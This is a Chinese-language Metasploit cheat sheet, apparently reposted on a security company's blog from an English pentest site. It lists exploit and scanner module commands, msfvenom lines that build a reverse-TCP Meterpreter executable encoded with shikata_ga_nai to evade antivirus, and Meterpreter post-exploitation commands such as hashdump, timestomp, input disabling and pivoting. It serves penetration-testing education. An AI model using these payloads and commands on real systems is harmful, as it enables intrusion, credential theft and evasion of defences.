Metasploit 备忘手册

Metasploit:

搜索模块:

msf > search [regex]

指定并利用:

msf > use exploit/[ExploitPath]

指定要使用的有效负载:

msf > set PAYLOAD [PayloadPath]

显示当前模块的选项:

msf > show options

设置选项:

msf > set [Option] [Value]

开始利用:

msf > exploit 

端口扫描仪:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS枚举:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP服务器:

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

代理服务器:

msf > use auxiliary/server/socks4
msf > run 

msfvenom:
 msfvenom工具可以被用来生成Metasploit的有效载荷(如Meterpreter就会)作为独立的文件,并且能随意的进行编码以便于免杀。此工具取代了以前的msfpayload和msfencode工具。使用’-l payloads’运行以获取有效负载列表。

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

示例:将Meterpreter有效负载
反转为可执行文件并重定向到文件中:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

格式选项(用-f指定)–help-formats – 列出可用的输出格式
exe – 可执行文件pl – Perl rb – Ruby raw – 原始shellcode c – C代码
使用msfvenom编码有效负载
msfvenom工具可用于应用级别用于过杀软的编码。使用’-l encoders’运行以获取编码器列表。

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

示例
使用shikata-ga-nai编码器从msfpayload对有效负载进行5次编码并输出为可执行文件:

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter

基本命令:
?/ help:显示命令摘要退出/退出:退出Meterpreter会话
sysinfo:显示系统名称和操作系统类型
shutdown / reboot:不言自明的
文件系统命令:
cd:更改目录
lcd:更改本地(攻击者)计算机上的目录
pwd / getwd:显示当前工作目录
ls:显示目录
cat的内容:在屏幕上
下载/上传显示文件内容:将文件移入/移出目标机器
mkdir / rmdir:创建/删除目录
编辑:打开一个默认编辑器中的文件(通常是vi)
进程命令:
getpid:显示Meterpreter正在其中运行的进程ID。
getuid:显示Meterpreter正在运行的用户ID。
ps:显示进程列表。
kill:根据进程ID终止进程。
执行:使用加载Meterpreter的进程的权限运行给定程序。
迁移:跳转到给定的目标进程ID

  • 目标进程必须具有相同或更低的权限
  • 目标过程可能是一个更稳定的过程
  • 在进程内部时,可以访问进程锁定的任何文件。

网络命令:
ipconfig:显示网络接口信息
portfwd:通过TCP会话 路由转发数据包
:管理/查看系统的路由表

Misc命令:
idletime:显示目标机器的GUI空闲的持续时间。
uictl [enable / disable] [keyboard / mouse]:启用/禁用目标机器的鼠标或键盘。
屏幕截图:将图像保存为目标计算机的屏幕截图。

附加模块:
使用[module]:加载指定的模块
示例:
use priv:加载priv模块
hashdump:导出哈希
timestomp:更改NTFS文件时间戳

管理会话

多次利用:
运行漏洞利用单个会话立即转为后台:

msf > exploit -z

在后台运行漏洞利用一个或多个立即后台的会话:

msf > exploit –j

列出所有当前作业(通常利用侦听器):

msf > jobs –l

杀掉某个运行中的会话

msf > jobs –k [JobID]

多个会话:

列出所有后台会话:

msf > sessions -l

与后台会话互动:

msf > session -i [SessionID]

当前的交互式会话:

meterpreter > <Ctrl+Z>
or
meterpreter > background

通过会话路由:
针对目标子网掩码的所有模块(exploit/ post / aux)将通过此会话进行尝试。

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

本文转译自【https://pentesttools.net/metasploit-cheat-sheet/】

原创文章,作者:absec,如若转载,请注明出处:http://absec.cn/?p=422

发表评论

登录后才能评论

联系我们

010-61943626

在线咨询:点击这里给我发消息

邮件:marketing@anbai.com

工作时间:电话:周一至周五,10:00-18:30,节假日休息,邮件随时发哦~